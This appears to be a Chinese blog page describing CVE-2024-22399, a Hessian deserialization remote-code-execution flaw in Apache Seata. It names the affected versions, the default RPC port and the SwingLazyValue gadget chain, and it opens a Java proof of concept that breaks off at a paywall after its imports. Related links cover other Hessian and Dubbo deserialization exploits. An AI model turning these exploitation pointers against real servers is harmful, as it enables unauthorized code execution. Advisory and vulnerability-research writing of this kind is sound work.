Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399)

最新推荐文章于 2025-06-30 16:23:25 发布
原创 最新推荐文章于 2025-06-30 16:23:25 发布 · 505 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #web安全 #安全威胁分析 #漏洞复现 #漏洞库 #渗透测试

漏洞描述

Apache Seata(incubating) 是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。

Seata用于服务端与客户端通信的RPC协议(默认8091端口)以及2.0.0开始实现的Raft协议消息均支持hessian格式,在2.1.0及1.8.1版本之前的Hessian反序列化操作校验不严格,自身安全校验HessianSerializerFactory只作用于serialize序列化过程。

攻击者可通过向Seata服务端发送恶意的hessian格式RPC数据,通过SwingLazyValue等利用链反序列化执行任意代码。

poc

package org.example;

import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.SerializerFactory;
import io.netty.bootstrap.Bootstrap;
import io.netty.buffer.ByteBuf;
import io.netty.channel.ChannelFuture;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioSocketChannel;
import io.netty.handler.codec.MessageToByteEncoder;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.seata.core.protocol.RpcMessage;
import io.seata.core.compressor.Compressor;
import io.seata.core.compressor.CompressorFactory;
import io.seata.core.rpc.netty.v1.HeadMapSerializer;
import io.seata.serializer.hessian.HessianSerializerFactory;
import sun.swing.SwingLazyValue;

import javax.activation.MimeTypeParameterList;
import javax.swing.*;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.M
最低0.47元/天 解锁文章
Hessian 反序列化RCE漏洞复现
0xSec
12-29 2979
Hessian是二进制的web service协议,官方对Java、Flash/Flex、Python、C++、.NET C#等多种语言都进行了实现。Hessian和Axis、XFire都能实现web service方式的远程方法调用,区别是Hessian是二进制协议,Axis、XFire则是SOAP协议,所以从性能上说Hessian远优于后两者,并且Hessian的JAVA使用方法非常简单。它使用Java语言接口定义了远程对象,集合了序列化/反序列化和RMI功能。Hessian是一个轻量级的RPC框架。
CVE-2024-2389 未经身份验证的命令注入
技术超强的网络安全平台
09-18 1647
应该注意的是,run() 方法还接受第二个参数,它是一个参数数组,将使用 escapeshellarg() 括在引号中,以防止命令注入。如果 run() 的第二个参数中将参数作为数组,则不太可能利用这一点,因为数组中的每个项目都被视为一个参数,并在调用 assembleCommand() 时通过 escapeshellarg() 传递。在 “PdfGenerator.php” 中,generate() 方法 [1] 只是调用 getExec.run() [2] 方法的包装器,该方法执行系统命令。
Apache Seata < 2.3.0 raft反序列化漏洞
最新发布
murphysec的博客
06-30 474
Apache Seata <2.3.0存在高危反序列化漏洞CVE-2025-32897),影响Seata Server [2.0.0, 2.3.0)版本。Raft模块CustomDeserializer未校验用户可控类名,直接通过Class.forName()加载,攻击者可利用服务端恶意链实现远程代码执行。修复版本2.3.0引入白名单机制,仅允许反序列化org.apache.seata包下类。建议受影响用户立即升级至2.3.0及以上版本,或限制Raft端口访问并启用IP白名单。
JavaSec | Hessian 学习分析
zgz67611的博客
01-22 1275
hessian 是个轻量级的远程 http 工具,采用binaray Rpc协议,适合发送二进制数据,同时具有防火墙穿透功能,hessian 一般通过 web 应用来提供服务。一句话说就是Hessian是一个基于http的二进制rpc轻量级工具。什么是 RPC 呢?,远程过程调用,RPC它以标准的二进制格式来定义请求的信息(请求对象、方法、参数等),这种方法传输信息的优点之一就是跨语言及操作系统。
Java Hessian反序列化漏洞
Keepb1ue的博客
01-10 4745
Java Hessian反序列化漏洞复现
hessian序列化_漏洞情报Apache Dubbo反序列化漏洞及补丁绕过(哨兵云支持检测)...
weixin_36194075的博客
01-04 409
Apache Dubbo 是一种基于 Java 的高性能 RPC 框架。该项目于 2011 年开源,并于 2018 年 2 月进入 Apache 孵化器,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。近日,默安科技应急响应中心发现Apache Dubbo发布安全公告,披露Provider默认反序列化导致的远程代码执行漏洞(CVE-2020-19...
Hessian反序列化漏洞学习记录
include_voidmain的博客
10-13 1118
Hessian反序列化漏洞学习记录
精选资源
apache-seata-2.1.0-incubating-bin.tar.gz
04-15
Apache Seata 是一款开源的分布式事务解决方案,旨在提供高性能和易用性的分布式事务服务。它的主要设计理念是易于使用、易于理解和易于维护。Seata 为用户提供了全面的分布式事务服务,支持AT、TCC、SAGA和XA事务...
apache-seata-2.2.0-incubating-bin.tar.gz
10-11
最后,压缩包中还会包含seata-namingserver和seata-server两个文件夹,分别存放了Seata的命名服务和服务器端的相关文件。命名服务负责注册和发现服务,而服务器端则是Seata的核心,负责全局事务的协调和管理。 ...
apache-seata-2.3.0-incubating-bin.tar.gz
06-01
Seata 是一款开源的分布式事务解决方案,致力于在微服务架构下提供高性能和简单易用的分布式事务服务
Apache Dubbo Hession反序列化漏洞CVE-2022-39198)
huofuman960209的博客
11-07 2495
Apache Dubbo组件存在Hession反序列化漏洞,该漏洞是由于Dubbo hessian-lite 3.2.12及之前版本中存在反序列化漏洞,利用此漏洞可在目标系统上执行恶意代码,最终获取服务器最高权限,漏洞编号:CVE-2022-39198,漏洞威胁等级:高危。
记1.4.2版本的seata大坑no available service ‘null‘ found, please make sure registry config correct
lwkkk的博客
04-12 1709
还有错误是 问题二,三: 0101 can not connect to 0.0.0.1:8091 cause:can not register RM,err:can not connect to services-server. can not connect to services-server. 针对标题的问题,首先排查下依赖加对了没有,博主照b站up主教学导入的依赖,结果就悲剧了... up主用的是1.3版本的seata,而博主用的是1.4.2版本的seata,支持在nacos配置中心用一
[漏洞利用]xxl-job Hessian2反序列化漏洞深入利用
LiangYueSec的博客
10-08 3324
[漏洞利用]xxl-job Hessian2反序列化漏洞深入利用
[工具推荐]Hessian反序列化漏洞利用工具分享
LiangYueSec的博客
08-22 1056
[工具推荐]Hessian反序列化漏洞利用工具分享
『Java安全反序列化-浅析Hessian反序列化POP链
Ho1aAs‘s Blog
07-22 1458
# 反序列化漏洞原理 在反序列化时,会通过标志位判断对象的类型,然后调用对应类的反序列化器 对应方法在`SerializerFactory.loadDeserializer()` 具体会**调用到Map的put方法**写入键值对 **对于Map类:会调用反序列化器的readMap方法进行反序列化操作**,默认反序列化出来的是HashMap类 而**HashMap的put方法就会调用键自身的hashCode方法来判断是否有重复**,进而就造成了漏洞风险,这里不再赘述 **对于TreeMap还有equals.
seata 踩坑记录
流离岁月的博客
07-19 1918
seata 踩坑记录 1.seata1.4.2 版本 有个bug,客户端启动时候影响了spring security oauth2的bean初始化 原因:seata1.4.2中io.seata.spring.utilsProxyUtils#findTargetSpringClass中获取代理对象的方法targetSource.getTargetClass()引起的。 在1.4.1 之前,对于TargetSource这个对象, 认为就是静态对象,所以直接取的targetSource.getTargetCl
seataseata整合nacos+springcloud alibaba+openfeign+fallbackFactory保姆级教程 解决openfeign降级 seata失效问题及各种坑点
孟秋与你的博客
12-15 4142
本文环境采用的是2021.x中最新的版本,也是springboot 2中 最新的版本对应关系, 亲测可行,阅读教程前请先核对自己的版本。 (2022.x与springboot3对应,而springboot3又和高版本jdk关联,博主暂没研究)nacos版本:2.2.0 seata版本:1.6.1 springboot: 2.6.13 spring-cloud: 2021.0.5 spring-cloud-alibaba: 2021.0.5.0 其它: mybatis plus: 3.5.1 openfeig
反序列化工具_Hessian反序列化RCE漏洞复现分析
weixin_40003512的博客
12-02 1619
Hessian是一个轻量级的RPC框架。它基于HTTP协议传输,使用Hessian二进制序列化,对于数据包比较大的情况比较友好。Hessian反序列化类似Java反序列化,可导致RCE,POC好像2017年就公开了,但是最新版本hessian-4.0.60.jar,经过测试也存在反序列化RCE问题。使用marshalsec项目工具(https://github.com/mbechler/...
Java Unmarshalling Security - 攻击Hessian协议
Exploit的小站~
05-10 9103
0x00 Hessian协议解析 Hessian是一个轻量级的Java反序列化框架,和Java原生的序列化对比,hessian更加高效并且非常适合二进制数据传输。 既然是一个序列化/反序列化框架,hessian也有反序列化命令执行的问题,这个在marshalsec工具中有所体现。这里有个有趣的点,在hessian框架中,ysoserial框架提供的gadget无法使用,你会发现在hessian...
apache-seata-2.1.0-incubating-bin seata服务中 conf文件夹中的文件及配置yml介绍
03-28
namespace: seata-namespace cluster: default ``` - `cluster` 需与客户端配置的事务组匹配[^4]。 ##### **1.4 配置中心(`config`)** 指定配置来源(如 Nacos、ZooKeeper): ```yaml config: type: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值